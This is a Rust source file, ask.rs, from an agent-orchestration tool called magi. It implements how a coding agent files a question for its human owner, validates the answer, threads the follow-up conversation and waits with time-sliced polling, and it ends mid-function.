Skip to main content

magi/
ask.rs

1//! Questions: what an agent does when the next decision is the owner's.
2//!
3//! An agent that reaches a fork it has no authority to take - which storage
4//! backend, whether a breaking change is acceptable, which of two readings of
5//! the task is meant - has two options. It can guess, and produce an
6//! implementation the owner throws away; or it can stop and ask. This module is
7//! the second option, and it is the reason the graph can be left alone
8//! overnight without also being left to invent product decisions.
9//!
10//! Stopping is cheap on purpose. The run parks as [`RunStatus::Waiting`], which
11//! [`crate::daemon::settle`] refunds, so a question does not spend a task's
12//! retry budget: an operator who asks twice would otherwise come back to a held
13//! task that never had a line of code judged.
14//!
15//! # Shape
16//!
17//! Deliberately the same split as [`crate::queue`]. [`Question`] is data plus
18//! *pure* transitions - [`Question::answer`] is where a phone posting a choice
19//! the question never offered is rejected, and it touches no disk. [`Questions`]
20//! owns all I/O and is constructed with its root, so a test drives a real store
21//! in a temp directory without touching the operator's real home.
22//!
23//! One question is one JSON file under [`Questions`]'s root, written atomically.
24//! Files rather than a database because three processes read and write these
25//! records - the run that asked, `magi web` serving the phone, and `magi answer`
26//! at a terminal - and a rename is the only cross-process atomic write that
27//! needs no coordination between them. It is also why the wait below polls: the
28//! answer arrives in a file written by a process this one has no channel to.
29//!
30//! [`RunStatus::Waiting`]: crate::run::RunStatus::Waiting
31
32use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43/// On-disk format for a question. Bumped when a field's meaning changes, or -
44/// as with [`Question::thread`], [`Question::answer_timeout`] and now the
45/// waiter bookkeeping ([`Question::cwd`], [`Question::waiter`],
46/// [`Question::delivered_turns`], [`Question::answer_delivered`]) - when a
47/// new field is added that a much older magi has no notion of at all.
48///
49/// The web UI is written against this shape by hand - there is no shared schema
50/// between the front end and this struct - so a field that changes meaning
51/// without a bump here is a UI that lies silently.
52///
53/// A file is refused only when its own `schema` is *greater* than this one -
54/// see [`read_path`] - never merely different: `#[serde(default)]` on every
55/// field added since 1 is what makes an older file's absence of `thread` mean
56/// "no conversation yet" rather than "unreadable", and a strict equality check
57/// would turn every bump into an upgrade that breaks reading yesterday's
58/// question files.
59pub const SCHEMA: u32 = 4;
60
61/// How often the wait re-reads the question file.
62///
63/// Three seconds: the answer comes from a human on a phone, so the difference
64/// between three seconds and three hundred milliseconds is invisible to them,
65/// while a tight loop would `stat` and parse a file thousands of times per
66/// minute for a wait that routinely lasts hours. Nothing is held between polls -
67/// no lock, no open handle - because `magi web` and `magi answer` write the
68/// same file from other processes.
69const POLL: Duration = Duration::from_secs(3);
70
71/// How long an agent's reply may go unnoticed before it earns its own
72/// notification.
73///
74/// An operator reading the card when the agent replies does not need paging
75/// again for a conversation they are already in; one who walked away still
76/// needs the tap on the shoulder. Five minutes is a judgement call about that
77/// line, not a policy a repository has an opinion about, which is why it lives
78/// here rather than in `magi.toml`: the operator cannot tell from `magi.toml`
79/// whether they are still looking at the phone, and neither can this build, so
80/// there is nothing for a per-repository setting to be *right* about.
81const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83/// How long the operator's notification command may run before it is killed.
84///
85/// A webhook that hangs must not hang the run. Twenty seconds is long enough
86/// for a slow HTTP round trip and short enough that the operator still gets the
87/// question filed and the run parked in a bounded time.
88const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90/// The longest a single `magi ask` invocation may block on the owner before
91/// it hands the wait back to whatever is running it, rather than to
92/// [`Question::abandon`].
93///
94/// `answer_timeout` defaults to a day, and that is a deadline for the
95/// *question*, not a budget the calling process is free to spend all at
96/// once: an agent CLI's own shell tool kills a command that runs much longer
97/// than this, and the child it kills is `magi ask` itself - the one thing
98/// that would have read the owner's answer. Run 20260908-205802-c9eb is what
99/// that looks like end to end: seat `impl-A` asked, its tool timed the wait
100/// out, and the seat's own summary said it had backgrounded the blocking
101/// `magi ask` and would "continue once the owner replies" - except nothing
102/// was left to notice the reply. The seat exited `completed`, the
103/// backgrounded child died with it, and the owner's eventual answer on the
104/// web UI had nobody left to read it.
105///
106/// So a wait is sliced instead: this call blocks for at most `WAIT_SLICE`
107/// and returns [`Wait::Pending`] if nothing happened, which is not a
108/// failure - the caller runs `magi ask --wait <id>` again, in a fresh
109/// process the tool timeout has never seen. Four minutes leaves a ten-minute
110/// tool budget room for the CLI's own startup and the notification's round
111/// trip, while staying long enough that an owner who answers within the hour
112/// is not making an agent loop through fifteen slices to hear about it.
113const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115/// How long a lease stays believable after its last beat.
116///
117/// Longer than [`WAIT_SLICE`]'s hand-back gap by a wide margin: a slice that
118/// ends with [`Wait::Pending`] leaves the asking agent a moment to call
119/// `magi ask --wait` again, and a reply leaves it a moment to call `--thread`.
120/// A holder that beats every [`POLL`] and is silent for ninety seconds is gone
121/// or about to be, and a lease that is merely between two calls must not be
122/// mistaken for that - the daemon waiter would start a second agent on a
123/// conversation the first is still in.
124pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126/// How long [`Questions::update`]'s lock may be held before it is presumed
127/// left behind by a writer that died.
128const LOCK_STALE: Duration = Duration::from_secs(10);
129
130/// Environment variable naming the base URL of the web UI, for `{url}`.
131///
132/// A run cannot discover this by itself: `magi web` is a different process,
133/// usually started by hand and often on a different machine on the tailnet, and
134/// the address it settled on (Tailscale IP, port, or the fallback it warned
135/// about) exists only in that process. So the operator names it once, in the
136/// environment `magi serve` runs in - `magi web --open` prints exactly the
137/// string to use on stdout. Unset means `{url}` expands to nothing rather than
138/// to a guess: a notification carrying a link to an address nothing is
139/// listening on is worse than one carrying no link at all.
140pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142/// Largest panel magi will store, html plus assets.
143///
144/// Checked as a total, before a single byte is written, because the failure
145/// this prevents is not a full disk but a half-copied panel: an agent that
146/// points at a 200 MB screen recording must get one clean error, not a
147/// directory holding the three small files that fitted before the copy died.
148/// Eight mebibytes is far more than a diff, a table and a handful of images
149/// need, and small enough that a phone on a hotel link still renders it.
150pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152/// Suffix of the directory holding one question's panel.
153///
154/// A sibling of `<id>.json` rather than a subdirectory of the store, so
155/// [`Questions::list`] - which takes every `*.json` in the root - cannot ever
156/// see it, and so a panel travels with the question it belongs to.
157const PANEL_DIR: &str = ".panel";
158
159/// The panel's entry point inside its directory.
160const PANEL_HTML: &str = "index.html";
161
162/// Scratch directory a panel is assembled in before it is swapped into place.
163const PANEL_TMP: &str = ".panel.tmp";
164
165/// The one asset filename rule, applied on write **and** on read.
166///
167/// Exactly `^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$`, and additionally never
168/// containing `..`. The pattern is this narrow because the name arrives from
169/// two untrusted directions and is then joined onto a path: an agent naming
170/// the asset, and a URL naming it back to [`Questions::panel_asset`]. Every
171/// character that could change what the join means is outside the set - `/`
172/// and `\` cannot appear, so no name can descend or escape; a leading `.` is
173/// refused, so no name can be `..`, `.` or a dotfile; a drive letter's `:` is
174/// refused, which matters because on Windows `Path::join` with an absolute
175/// path *discards the whole prefix* and would serve any file on the disk.
176/// `..` is refused anywhere rather than only at the front so the rule reads
177/// the same as the sentence "no traversal" to anyone auditing it.
178///
179/// The length bound keeps a name inside every filesystem's limit, so a panel
180/// that stores cannot fail to store on the operator's other machine.
181pub fn valid_asset_name(name: &str) -> bool {
182    if name.is_empty() || name.len() > 64 || name.contains("..") {
183        return false;
184    }
185    let mut chars = name.chars();
186    chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187        && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190/// Where a question is in its life.
191#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194    /// Asked, and waiting for the owner. A run is parked behind it.
195    Open,
196    /// The owner decided. [`Question::answer`] holds what they said.
197    Answered,
198    /// Nobody answered in time, or the question outlived the run that asked.
199    /// Kept rather than deleted: what was asked and never answered is the
200    /// evidence that the operator was the bottleneck.
201    Abandoned,
202}
203
204impl QuestionStatus {
205    /// Is a run still parked behind this question?
206    pub fn open(self) -> bool {
207        matches!(self, Self::Open)
208    }
209
210    /// Lowercase name, as it appears on disk and in the API.
211    pub fn as_str(self) -> &'static str {
212        match self {
213            Self::Open => "open",
214            Self::Answered => "answered",
215            Self::Abandoned => "abandoned",
216        }
217    }
218}
219
220/// What the owner said.
221///
222/// Two shapes rather than one string because the question decides which is
223/// admissible, and [`Question::answer`] enforces it. A phone that posts
224/// `{"choice": "Redis"}` to a question that never offered Redis is a bug in the
225/// front end, and it is caught here rather than handed to an agent as fact.
226#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229    /// One of the offered choices, verbatim.
230    Choice(String),
231    /// Free text, for a question that offered no choices.
232    Text(String),
233}
234
235/// What the daemon does to the task behind a question when a particular
236/// choice is answered.
237///
238/// A closed set, attached to a choice by the asker (`magi ask --choice X
239/// --action X=resume`) and matched by the choice's exact text. Nothing here
240/// is ever derived from the wording of a label or of a free-text answer: a
241/// question without an action for the chosen label does nothing but answer.
242#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
243#[serde(tag = "do", rename_all = "lowercase")]
244pub enum ChoiceAction {
245    /// Resume this run of the task that owns the question.
246    Resume {
247        /// The run to continue. Must still be the task's latest run.
248        run: String,
249    },
250    /// Requeue the task as a fresh competition.
251    Requeue,
252    /// Close the task as done.
253    Done,
254}
255
256impl ChoiceAction {
257    /// Parse a `--action` value: `<label>=<verb>`, where the verb is
258    /// `resume[:<run>]`, `requeue` or `done`. A `resume` without a run takes
259    /// `default_run` (the asker's own `MAGI_RUN`). Returns the label and its
260    /// action; whether the label is one of the choices is the caller's check.
261    pub fn parse(spec: &str, default_run: &str) -> Result<(String, Self)> {
262        let Some((label, verb)) = spec.rsplit_once('=') else {
263            bail!("`--action {spec}` must look like `<choice>=<resume[:run]|requeue|done>`");
264        };
265        let label = label.trim();
266        if label.is_empty() {
267            bail!("`--action {spec}` names no choice before `=`");
268        }
269        let verb = verb.trim();
270        let action = match verb.split_once(':') {
271            Some(("resume", run)) if !run.trim().is_empty() => Self::Resume {
272                run: run.trim().to_owned(),
273            },
274            None if verb == "resume" => {
275                if default_run.is_empty() {
276                    bail!("`--action {spec}` names no run and MAGI_RUN is not set");
277                }
278                Self::Resume {
279                    run: default_run.to_owned(),
280                }
281            }
282            None if verb == "requeue" => Self::Requeue,
283            None if verb == "done" => Self::Done,
284            _ => bail!(
285                "unknown action `{verb}` in `--action {spec}`; \
286                 use resume[:<run>], requeue or done"
287            ),
288        };
289        Ok((label.to_owned(), action))
290    }
291
292    /// Short human wording, for `magi show` and the card.
293    pub fn describe(&self) -> String {
294        match self {
295            Self::Resume { run } => format!("resume run {}", short(run)),
296            Self::Requeue => "requeue the task".to_owned(),
297            Self::Done => "mark the task done".to_owned(),
298        }
299    }
300}
301
302/// Parse every `--action` value against the offered `choices`, refusing a
303/// label the question does not offer (it could never fire).
304pub fn parse_actions(
305    specs: &[String],
306    choices: &[String],
307    default_run: &str,
308) -> Result<std::collections::BTreeMap<String, ChoiceAction>> {
309    let mut out = std::collections::BTreeMap::new();
310    for spec in specs {
311        let (label, action) = ChoiceAction::parse(spec, default_run)?;
312        if !choices.contains(&label) {
313            bail!(
314                "`--action {spec}`: `{label}` is not one of the --choice values ({})",
315                choices.join(", ")
316            );
317        }
318        if out.insert(label.clone(), action).is_some() {
319            bail!("more than one --action for `{label}`");
320        }
321    }
322    Ok(out)
323}
324
325/// Who wrote one turn of a question's conversation.
326///
327/// Two values, not three: [`Question::thread`] is the record of a single
328/// question stopping and resuming, and the agent that resumes it is always
329/// the one that asked - a fresh consultant would have to be caught up on
330/// everything the first agent already knows, which is the round trip this
331/// module exists to avoid. The names and the wire spelling deliberately match
332/// [`crate::chat::Who`], which this module does not depend on: the two are the
333/// same idea in two products, and giving them the same shape is what lets the
334/// phone render both with one component.
335#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
336#[serde(rename_all = "lowercase")]
337pub enum Who {
338    /// The person the agent asked.
339    Operator,
340    /// The agent that asked, replying to a question of its own rather than
341    /// answering.
342    Agent,
343}
344
345/// One turn in a question's back-and-forth, after the question itself was
346/// asked.
347///
348/// The question's own `summary`/`detail`/`choices` already carry the agent's
349/// opening move, so a turn only exists from the moment the owner talks back -
350/// [`Question::thread`] starts empty and stays that way for the overwhelming
351/// majority of questions, which are answered on the first read.
352#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
353#[serde(deny_unknown_fields)]
354pub struct Turn {
355    /// Who said it.
356    pub who: Who,
357    /// What they said.
358    pub body: String,
359    /// When they said it.
360    pub at: Timestamp,
361}
362
363/// Who is keeping watch over an open question.
364#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
365#[serde(rename_all = "lowercase")]
366pub enum WaiterKind {
367    /// The `magi ask` process the agent started.
368    Asker,
369    /// The `magi serve` waiter ([`crate::waiter`]), resuming the asking seat's
370    /// own session because the asker is gone.
371    Daemon,
372}
373
374/// The record's note of who was last known to be waiting.
375///
376/// A note, not a promise: nothing rewrites the question when a holder dies, so
377/// whether it still holds is read from the [`Lease`] beside it.
378#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
379pub struct Waiter {
380    /// Who took the wait.
381    pub kind: WaiterKind,
382    /// When they took it.
383    pub since: Timestamp,
384}
385
386/// A sidecar (`<id>.lease`) saying that something is alive and waiting.
387///
388/// A sidecar rather than a field of the question because a holder beats every
389/// few seconds, and rewriting the question that often would race the phone's
390/// answer and say with lost updates. It is not `*.json`, so
391/// [`Questions::list`] never sees it. No pid check: pids are reused and mean
392/// different things across platforms, while a beat that stopped is evidence on
393/// every one.
394#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
395pub struct Lease {
396    /// Who beat last.
397    pub kind: WaiterKind,
398    /// Their process id, for a human reading the file.
399    pub pid: u32,
400    /// When they beat last.
401    pub beat_at: Timestamp,
402}
403
404impl Lease {
405    /// Was the last beat recent enough to believe the holder is still there?
406    pub fn fresh(&self, now: Timestamp) -> bool {
407        now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
408    }
409}
410
411/// One decision magi will not take on the owner's behalf.
412#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
413#[serde(deny_unknown_fields)]
414pub struct Question {
415    /// On-disk format version.
416    pub schema: u32,
417    /// Question id, e.g. `20260902-231501-ab12`. Same shape as a run's and a
418    /// task's, so the operator can paste any of them at any prefix argument.
419    pub id: String,
420    /// Run that is parked behind this question.
421    pub run: String,
422    /// Graph node the asking agent was working in, e.g. `implement`.
423    pub node: String,
424    /// Seat that asked, e.g. `impl-A`. Recorded because "which agent needs
425    /// this" decides whether the answer unblocks one candidate or all of them.
426    pub seat: String,
427    /// One line: the question itself. This is what a notification carries and
428    /// what the phone shows above the answer controls.
429    pub summary: String,
430    /// The reasoning behind the question, as markdown. May be long, may be
431    /// empty. Rendered as text nodes by the UI, never as markup.
432    pub detail: String,
433    /// The admissible answers. **Empty means free text** - that one condition
434    /// is the whole difference between the two kinds of question, on disk, in
435    /// the UI, and in [`Question::answer`]'s validation.
436    pub choices: Vec<String>,
437    /// What the daemon does when a given choice is answered, keyed by the
438    /// choice's exact text. Empty for an ordinary question. A key is always
439    /// one of [`Question::choices`]; `#[serde(default)]` so older files read.
440    #[serde(default)]
441    pub actions: std::collections::BTreeMap<String, ChoiceAction>,
442    /// Does this question have an agent-authored HTML panel beside it?
443    ///
444    /// Serialised with a default so a question written by an older magi - or
445    /// by hand - still deserialises rather than failing the whole store, which
446    /// under [`Questions::list`]'s skip-unreadable rule would quietly hide the
447    /// open question the operator was looking for.
448    #[serde(default)]
449    pub panel: bool,
450    /// Files copied in beside the panel's html, by base name, sorted.
451    ///
452    /// The list exists so a reader knows what a panel is made of without
453    /// walking the directory, and every entry satisfies [`valid_asset_name`].
454    /// Sorted because it is compared - a question re-asked with the same
455    /// assets in a different argument order is not a different question.
456    #[serde(default)]
457    pub assets: Vec<String>,
458    /// Current state.
459    pub status: QuestionStatus,
460    /// When the agent asked.
461    pub asked_at: Timestamp,
462    /// When the owner answered, if they did.
463    pub answered_at: Option<Timestamp>,
464    /// What they said.
465    pub answer: Option<Answer>,
466    /// Everything said after the question itself, oldest first: the owner
467    /// asking back, the agent replying, as many times as it takes before an
468    /// [`Answer`] lands.
469    ///
470    /// `#[serde(default)]` so a question written before this field existed -
471    /// every question on disk before this build - still deserialises as one
472    /// with no conversation yet, rather than failing [`Questions::list`]'s
473    /// read and quietly hiding an open question from the operator.
474    #[serde(default)]
475    pub thread: Vec<Turn>,
476    /// The `answer_timeout`, in seconds, that was in force when this question
477    /// was first asked. `0` means unrecorded - a question written before this
478    /// field existed, or one filed by a flow (land's merge-approval gate)
479    /// that never sets it because it never resumes a sliced wait.
480    ///
481    /// [`Question::new`] cannot know this - the effective timeout (`--timeout`,
482    /// or the config default) is decided by the caller, after the question
483    /// already exists - so it starts at `0` here and whoever files a fresh
484    /// question sets it once, the same way [`Question::panel`] is set by
485    /// [`Questions::put_panel`] rather than by the constructor. It is never
486    /// touched again: `magi ask --wait` reads it as the one deadline it is
487    /// allowed to enforce, precisely so that a `--timeout` given (or omitted)
488    /// on a later call can never quietly extend or shrink the budget the
489    /// question was actually asked with.
490    #[serde(default)]
491    pub answer_timeout: u64,
492    /// The directory the asking agent was working in when it asked, so the
493    /// daemon waiter can resume that agent's session from where it stood.
494    /// `None` for a question no `magi ask` filed (land's approval gate, a
495    /// release notice, one written before this field existed): those have no
496    /// agent to hand anything back to, and the waiter leaves them alone.
497    #[serde(default)]
498    pub cwd: Option<String>,
499    /// Who was last known to be waiting - see [`Waiter`].
500    #[serde(default)]
501    pub waiter: Option<Waiter>,
502    /// How many entries of [`Question::thread`] the agent has been shown, by
503    /// the asking process printing them or by the waiter resuming the seat.
504    /// The owner's turn at an index at or past this has reached nobody yet.
505    #[serde(default)]
506    pub delivered_turns: usize,
507    /// Has the agent been told the [`Answer`]? The asker prints it as it
508    /// returns; the waiter delivers it when the asker was gone.
509    #[serde(default)]
510    pub answer_delivered: bool,
511}
512
513impl Question {
514    /// Ask something. Persist it with [`Questions::put`], or hand it to
515    /// [`ask_and_wait`], which files it and waits.
516    pub fn new(
517        run: String,
518        node: String,
519        seat: String,
520        summary: String,
521        detail: String,
522        choices: Vec<String>,
523    ) -> Self {
524        Self {
525            schema: SCHEMA,
526            id: new_id(),
527            run,
528            node,
529            seat,
530            summary,
531            detail,
532            choices,
533            actions: std::collections::BTreeMap::new(),
534            panel: false,
535            assets: Vec::new(),
536            status: QuestionStatus::Open,
537            asked_at: Timestamp::now(),
538            answered_at: None,
539            answer: None,
540            thread: Vec::new(),
541            answer_timeout: 0,
542            cwd: None,
543            waiter: None,
544            delivered_turns: 0,
545            answer_delivered: false,
546        }
547    }
548
549    /// Short form used in reports and on the phone, matching a run's short id.
550    pub fn short(&self) -> &str {
551        short(&self.id)
552    }
553
554    /// The action attached to the choice that was answered, if the question
555    /// is answered with a choice that carries one. Free text never matches.
556    pub fn chosen_action(&self) -> Option<&ChoiceAction> {
557        match (&self.status, &self.answer) {
558            (QuestionStatus::Answered, Some(Answer::Choice(c))) => self.actions.get(c),
559            _ => None,
560        }
561    }
562
563    /// Does this question want free text rather than one of a set?
564    pub fn free_text(&self) -> bool {
565        self.choices.is_empty()
566    }
567
568    /// Record an answer. Rejects a choice the question does not offer, free
569    /// text on a multiple-choice question, an empty answer, and a second
570    /// answer.
571    ///
572    /// Every rejection here is a case where accepting would put a fabrication
573    /// in front of an agent as if the owner had said it. The messages are
574    /// distinct because the caller is a web handler that shows them verbatim,
575    /// and "that is not one of the choices" and "this question is multiple
576    /// choice" are different mistakes with different fixes.
577    pub fn answer(&mut self, answer: Answer) -> Result<()> {
578        match self.status {
579            QuestionStatus::Answered => bail!(
580                "question {} was already answered; the run has moved on and a \
581                 second answer would be a decision nobody acted on",
582                self.short()
583            ),
584            QuestionStatus::Abandoned => bail!(
585                "question {} was abandoned and the run behind it is gone",
586                self.short()
587            ),
588            QuestionStatus::Open => {}
589        }
590        let body = match &answer {
591            Answer::Choice(c) | Answer::Text(c) => c.as_str(),
592        };
593        if body.trim().is_empty() {
594            bail!(
595                "question {} needs an answer; an empty one tells the agent \
596                 nothing and it would guess anyway",
597                self.short()
598            );
599        }
600        match &answer {
601            Answer::Choice(c) if self.free_text() => bail!(
602                "question {} asks for free text, so `{c}` cannot be a choice \
603                 it offered",
604                self.short()
605            ),
606            Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
607                "`{c}` is not one of the choices question {} offers: {}",
608                self.short(),
609                self.choices.join(", ")
610            ),
611            Answer::Text(_) if !self.free_text() => bail!(
612                "question {} is multiple choice; answer with one of: {}",
613                self.short(),
614                self.choices.join(", ")
615            ),
616            _ => {}
617        }
618        self.answered_at = Some(Timestamp::now());
619        self.answer = Some(answer);
620        self.status = QuestionStatus::Answered;
621        Ok(())
622    }
623
624    /// Give up on an answer, keeping the record of what was asked.
625    ///
626    /// An answered question is left alone, which matters at exactly one moment:
627    /// the owner answering in the same second the wait's deadline passes. The
628    /// answer is the thing worth keeping there, and it has already been written
629    /// by another process.
630    ///
631    /// The reason is appended to [`Question::detail`] because the on-disk shape
632    /// is a contract with the front end and has no field of its own for it -
633    /// and "asked at 3am, nobody home for a day" belongs with the question, not
634    /// only in a log the operator will never open.
635    pub fn abandon(&mut self, why: impl Into<String>) {
636        if !self.status.open() {
637            return;
638        }
639        self.status = QuestionStatus::Abandoned;
640        let why = why.into();
641        let why = why.trim();
642        if why.is_empty() {
643            return;
644        }
645        if !self.detail.is_empty() {
646            self.detail.push('\n');
647        }
648        self.detail.push_str("\n_Abandoned: ");
649        self.detail.push_str(why);
650        self.detail.push_str("._\n");
651    }
652
653    /// The answer as the asking agent should read it.
654    ///
655    /// One string for both kinds of question: the agent's prompt says "the
656    /// owner answered:", and a chosen option and a typed sentence are the same
657    /// thing at that point. `None` while the question is open or abandoned, so
658    /// a caller cannot mistake silence for a decision.
659    pub fn resolution(&self) -> Option<String> {
660        match (self.status, &self.answer) {
661            (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
662                Some(a.clone())
663            }
664            _ => None,
665        }
666    }
667
668    /// The owner speaking back without answering: a request for context, a
669    /// clarifying question, anything short of a decision.
670    ///
671    /// Rejects the same two states [`Question::answer`] does, and for the same
672    /// reason - a question with a recorded [`Answer`] or an abandoned one has
673    /// no run left listening for a reply - and an empty turn, which would tell
674    /// the agent nothing it didn't already know. Never changes `status`: the
675    /// question stays [`QuestionStatus::Open`], because the owner did not
676    /// decide anything, they only spoke, and `count_open`/`open_for` must keep
677    /// counting this as the one question it always was.
678    pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
679        match self.status {
680            QuestionStatus::Answered => bail!(
681                "question {} was already answered; there is nothing left to \
682                 discuss",
683                self.short()
684            ),
685            QuestionStatus::Abandoned => bail!(
686                "question {} was abandoned and the run behind it is gone",
687                self.short()
688            ),
689            QuestionStatus::Open => {}
690        }
691        let body = body.into();
692        if body.trim().is_empty() {
693            bail!("a message to question {} cannot be empty", self.short());
694        }
695        self.thread.push(Turn {
696            who: Who::Operator,
697            body,
698            at: Timestamp::now(),
699        });
700        Ok(())
701    }
702
703    /// The agent replying to the owner's last word, in place of an answer:
704    /// same question, same id, another round.
705    ///
706    /// `choices` replaces [`Question::choices`] wholesale rather than merging,
707    /// on the same reasoning [`Questions::put_panel`] replaces a panel
708    /// wholesale: the whole point of asking back is that what should be
709    /// offered next may have changed, and a caller that wanted the old set
710    /// unchanged can simply pass it again. An empty `Vec` means free text,
711    /// exactly as it does when the question is first asked.
712    pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
713        match self.status {
714            QuestionStatus::Answered => bail!(
715                "question {} was already answered; replying now would not \
716                 reach anyone",
717                self.short()
718            ),
719            QuestionStatus::Abandoned => bail!(
720                "question {} was abandoned and the run behind it is gone",
721                self.short()
722            ),
723            QuestionStatus::Open => {}
724        }
725        let body = body.into();
726        if body.trim().is_empty() {
727            bail!("a reply to question {} cannot be empty", self.short());
728        }
729        // An action whose label is no longer offered could never fire.
730        self.actions.retain(|label, _| choices.contains(label));
731        self.choices = choices;
732        let unread = self.unread_from_owner().is_some();
733        self.thread.push(Turn {
734            who: Who::Agent,
735            body,
736            at: Timestamp::now(),
737        });
738        // The agent has read everything up to its own reply - but only if
739        // nothing the owner said in the meantime is still unread. A second say
740        // that landed after the agent's last look must stay undelivered.
741        if !unread {
742            self.delivered_turns = self.thread.len();
743        }
744        Ok(())
745    }
746
747    /// What the owner said that the agent has not read yet, oldest first,
748    /// joined. `None` unless the question is open and such a turn exists.
749    ///
750    /// Not [`Question::waiting_on_agent`]: an agent's reply can land *after* a
751    /// second owner turn it never saw, which leaves the last turn the agent's
752    /// and the ball apparently back with the owner while a say is still unread.
753    pub fn unread_from_owner(&self) -> Option<String> {
754        if !self.status.open() {
755            return None;
756        }
757        let from = self.delivered_turns.min(self.thread.len());
758        let said: Vec<&str> = self.thread[from..]
759            .iter()
760            .filter(|t| t.who == Who::Operator)
761            .map(|t| t.body.as_str())
762            .collect();
763        (!said.is_empty()).then(|| said.join("\n\n"))
764    }
765
766    /// When the conversation last moved: the newest thread turn, or the asking
767    /// itself, in seconds. `magi ask --thread` re-arms `answer_timeout` on
768    /// every reply, so a deadline runs from here and not from `asked_at`.
769    pub fn last_activity(&self) -> i64 {
770        self.thread
771            .iter()
772            .map(|t| t.at.as_second())
773            .max()
774            .unwrap_or(0)
775            .max(self.asked_at.as_second())
776    }
777
778    /// Is the ball in the agent's court?
779    ///
780    /// True from the moment the owner speaks back until the agent's next
781    /// [`Question::reply`], and never on a fresh or an already-settled
782    /// question. [`QuestionStatus`] does not move for either side of this -
783    /// see [`Question::say`] - so this is the one place that state is
784    /// readable at all, which is why [`crate::web::QuestionView`] carries it
785    /// separately rather than asking the phone to infer it from the thread.
786    pub fn waiting_on_agent(&self) -> bool {
787        self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
788    }
789
790    /// Should a notification go out right now?
791    ///
792    /// Always, for the very first ask: [`Question::thread`] is still empty, so
793    /// there is no earlier operator turn to have already caught anyone's
794    /// attention. After that, only once [`REPLY_QUIET_WINDOW`] has passed
795    /// since the owner's own last word - see that constant for why the window
796    /// exists at all and why its length is not configurable.
797    fn should_notify(&self, now: Timestamp) -> bool {
798        let Some(last) = self
799            .thread
800            .iter()
801            .rev()
802            .find(|t| t.who == Who::Operator)
803            .map(|t| t.at)
804        else {
805            return true;
806        };
807        now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
808    }
809}
810
811/// A question store on disk.
812#[derive(Debug, Clone)]
813pub struct Questions {
814    root: PathBuf,
815}
816
817impl Questions {
818    /// The operator's questions, `<home>/questions`.
819    pub fn open() -> Self {
820        Self::at(crate::run::home().join("questions"))
821    }
822
823    /// A store at an explicit root. Tests use this, which is why none of them
824    /// need the operator's real home.
825    pub fn at(root: PathBuf) -> Self {
826        Self { root }
827    }
828
829    /// Directory holding the question files.
830    pub fn root(&self) -> &Path {
831        &self.root
832    }
833
834    /// Path for one question id.
835    pub fn path_of(&self, id: &str) -> PathBuf {
836        self.root.join(format!("{id}.json"))
837    }
838
839    /// Directory holding one question's panel, `<root>/<id>.panel`.
840    pub fn panel_dir(&self, id: &str) -> PathBuf {
841        self.root.join(format!("{id}{PANEL_DIR}"))
842    }
843
844    /// Store a panel: the html, plus `assets` copied in under their base
845    /// names. Updates `q.panel` and `q.assets`; the caller then [`put`]s the
846    /// question, or the record on disk will deny having a panel that exists.
847    ///
848    /// The assets are **copied, not referenced**. An agent authors its panel
849    /// inside a candidate worktree and points at files there, and `magi fold`
850    /// deletes those worktrees; a question is the permanent record of a
851    /// decision the owner took, so a panel that referenced its own images
852    /// would render as broken boxes exactly when someone went back to ask why
853    /// the decision was made. Copying follows symlinks - [`std::fs::copy`]
854    /// does, and so does the [`std::fs::metadata`] the size is measured with,
855    /// so the bytes counted and the bytes written are the same target file's -
856    /// which is the intent: storing a link would leave the panel pointing at
857    /// the worktree again, one indirection further away.
858    ///
859    /// Everything that can be rejected is rejected before the first byte is
860    /// written, and the panel is then assembled in a scratch directory and
861    /// swapped in. So a refusal leaves the previous panel intact, and a
862    /// success replaces it *wholesale* rather than merging: a re-asked
863    /// question showing one attempt's diff next to another attempt's table
864    /// would be a panel neither agent ever wrote.
865    ///
866    /// [`put`]: Questions::put
867    pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
868        if !valid_asset_name(&q.id) {
869            bail!(
870                "question id `{}` is not a name magi will build a panel path from",
871                q.id
872            );
873        }
874        if html.trim().is_empty() {
875            bail!(
876                "question {} was handed an empty panel; an empty frame reads to \
877                 the owner as \"the agent had nothing to say\", which is a lie",
878                q.short()
879            );
880        }
881
882        // Names, then sizes, then writing - in that order, so nothing below
883        // can leave a partial panel on disk.
884        let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
885        for src in assets {
886            let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
887            if !valid_asset_name(name) {
888                bail!(
889                    "panel asset `{}` cannot be stored: a panel file name must \
